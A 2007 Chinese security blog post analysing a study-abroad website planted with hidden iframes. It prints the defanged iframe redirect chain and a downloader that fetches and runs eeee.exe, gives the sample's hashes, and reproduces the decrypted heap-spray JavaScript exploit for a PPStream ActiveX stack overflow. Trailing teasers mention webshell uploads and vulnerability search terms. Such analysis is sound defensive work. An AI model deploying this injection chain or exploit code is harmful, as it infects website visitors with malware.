某留学网站被植入利用 PPStream 堆栈漏洞的代码

原创 2007年09月30日 17:57:00

某留学网站被植入利用 PPStream 堆栈漏洞的代码

endurer 原创
2007-09-30 第1

网站被植入代码:
/---
<iframe src=hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 width=0 height=0></iframe>
---/

hxxp://xxx.7**45*97**0.com/newdm/new05.htm?075 包含代码:
/---
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/014.htm'></iframe>
<iframe width='0' height='0' src='hxxp://xxx.7**45*97**0.com/wm/pps.htm'></iframe>
---/

hxxp://xxx.7**45*97**0.com/wm/014.htm 下载 hxxp://down.d*j**7*78*8.cn/eeee.exe,创建 eeee.vbs 来实现运行。

文件说明符 : D:/test/eeee.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-30 17:35:3
修改时间 : 2007-9-30 17:34:56
访问时间 : 2007-9-30 17:36:41
大小 : 18944 字节 18.512 KB
MD5 : 711db0f8a651b3877db9febfa4060cdb
HSA1: ECA7F2889F07E04257575EEEAC9AB30F97EC7311

UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo

hxxp://xxx.7**45*97**0.com/wm/pps.htm 是一段加密过的 PPStream 堆栈漏洞利用代码,解密后为:
/---
var newcode=unescape("%u00E8%u0000%u6A00%uEB……%u776f%u2e6e%u6a64%u3737%u3838%u632e%u2f6e%u7070%u2e73%u7865%u0065");bigblock=unescape("%u9090");headersize=20;slackspace=headersize+newcode.length;while(bigblock.length<slackspace)bigblock+=bigblock;fillblock=bigblock.substring(0,slackspace);block=bigblock.substring(0,bigblock.length-slackspace);while(block.length+slackspace<0x40000)block=block+block+fillblock;memory=new Array();for(x=0;x<400;x++)memory[x]=block+newcode;var buffer='\x0a';while(buffer.length<500)buffer+='\x0a\x0a\x0a\x0a';ppc.Logo=buffer;
---/ 

智能一代云平台(十六):解决Linux服务器被植入木马总结

【前言】     继上次Redis服务器被劫持风暴(高校云平台(十三):Redis服务器被劫持风波)过后十多天后,病毒对我们总是恋恋不舍,又一次的来到我们身边;有了上次的经验后,这次处理起来虽然也有些...
  • u012829124
  • u012829124
  • 2017年03月12日 19:32
  • 734

入侵网站的各种漏洞的利用和搜索参数

一、E时代驿站漏洞    百度搜索"E时代驿站"    漏洞利用页面 /upload.asp 用老兵直接上传    二、沸腾新闻系统上传漏洞    搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用  ...
  • yandong19861103
  • yandong19861103
  • 2008年03月24日 14:54
  • 427

APP的HTML5页面经过运营商网络被植入手机管家问题及分析,解决方案见新文章

MAC iOS从ios8开始支持HTML,为了兼容IOS7一般使用WebViewJavascriptBridge这个第三方控件,IOS8自带的HTML5功能我也没有使用过,俺还是使用这个第三方控件简单...
  • jia12216
  • jia12216
  • 2015年08月16日 23:59
  • 2961

App漏洞将导致严重后果

中国IT研究中心(CNIT-Research)4月份发布的《2014年Q1中国手机安全产品市场调研报告》显示,93.7%的用户担心手机安全问题,很大一部分手机安全问题是APP漏洞导致,App漏洞导致的...
  • aijiami0
  • aijiami0
  • 2014年06月04日 15:19
  • 579

如何检测网站死链接?

正所谓“知己知彼,百战不殆”。我们现在已经能够知道网站死链接带来的负面影响,那么我们就要提前做好准备。      针对网站死链接,我们有方法可以检测到,这就是我们所说的提前做好“战斗”的准备。  ...
  • swlhome
  • swlhome
  • 2015年07月15日 15:28
  • 544

某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码

endurer 原创2007-04-29  第1版植入的代码为:/---<iframe src=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htm width...
  • Purpleendurer
  • Purpleendurer
  • 2007年04月29日 22:06
  • 1136

利用ASP上传漏洞得到webshell实战

可以说是2004年网络安全届的经典漏洞!前段时间被上传漏洞和ASP木马闹得沸沸扬扬,狗狗他们的网站被黑了一次又一次所以开始关心上传漏洞方面的网络安全问题,昨天终于试验了整个流程上传漏洞." href=...
  • cxzhq2002
  • cxzhq2002
  • 2008年01月10日 17:50
  • 861

【seo优化】为什么说网站被劫持了?

说到网站被劫持,其实很多站长并不陌生,可如何才能有效发现并避免被劫持,是很多网站头疼的问题!   一、什么是网站劫持   网站劫持:是指打开一个网址的时候,出现一个不属于网站范畴的广告,或者是跳转...
  • hj7jay
  • hj7jay
  • 2017年03月24日 10:05
  • 410

常见漏洞类型汇总

http://www.cnvd.org.cn/publish/main/78/2012/20120924161917256776912/20120924161917256776912_.html 一...
  • caolaosanahnu
  • caolaosanahnu
  • 2014年03月19日 11:43
  • 1114

网站常见安全漏洞概述

网站比较低级的漏洞有:1.SQL注入漏洞;2.XSS跨站脚本攻击漏洞;3.文件上传漏洞;4.目录遍历漏洞;5.admin密码漏洞;6.权限审阅漏洞。 下面就来简单的分析一下各个漏洞内容以及防入侵方法...
  • moshengtan
  • moshengtan
  • 2014年03月28日 14:48
  • 5301
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:某留学网站被植入利用 PPStream 堆栈漏洞的代码
举报原因:
原因补充:

(最多只允许输入30个字)